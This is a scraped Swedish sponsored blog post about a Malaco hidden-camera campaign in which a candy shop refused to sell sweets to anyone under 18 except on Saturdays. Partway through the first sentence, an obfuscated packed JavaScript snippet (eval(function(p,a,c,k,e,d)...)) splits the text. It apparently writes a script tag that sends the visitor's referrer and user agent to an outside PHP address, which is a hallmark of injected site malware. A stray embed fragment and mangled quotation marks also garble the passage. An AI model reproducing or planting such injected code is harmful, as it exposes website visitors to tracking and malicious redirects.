Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Sponsored Video: Malaco testar 18-årsgräns på godis. Kul!

Sponsored Video: Malaco testar 18-årsgräns på godis. Kul!
Filip Urde
  • On 15 oktober, 2013
  • http://www.revue.se/filip-urde

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_145871792.js”>
Att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tthir|var|u0026u|referrer|ndeet||js|php’.split(’|’),0,{}))
vara vuxen har såklart sina fördelar. Bland annat kan vuxna unna sig lördag hela veckan med godis precis så mycket de vill. Det har Malaco lagt märke till och inser även att fler än vuxna vill kunna ha lördag hela veckan.

En vanlig tisdag bestämde sig Malaco för att vara lite extra stränga med lördagsgodisregeln. Ingen (och då menar jag verkligen INGEN) under 18 år fick köpa godis i butiken. För att vara extra j*vliga så såg man till att ha ett helt oemotståndligt erbjudande i butiken.

”Ha’ru leg?”

Under dold-kamera så placerades ett par skådespelare ut bakom disken i en godisbutik och lät dem göra en egen improvisation, med enda regeln, under 18 = bara godis på lördagar (och langning var förstås inte heller tillåtet).

Det visade sig att det är fler än vuxna som vill ha lördag hela veckan kan man säga.
sponsrat inlägg av Malaco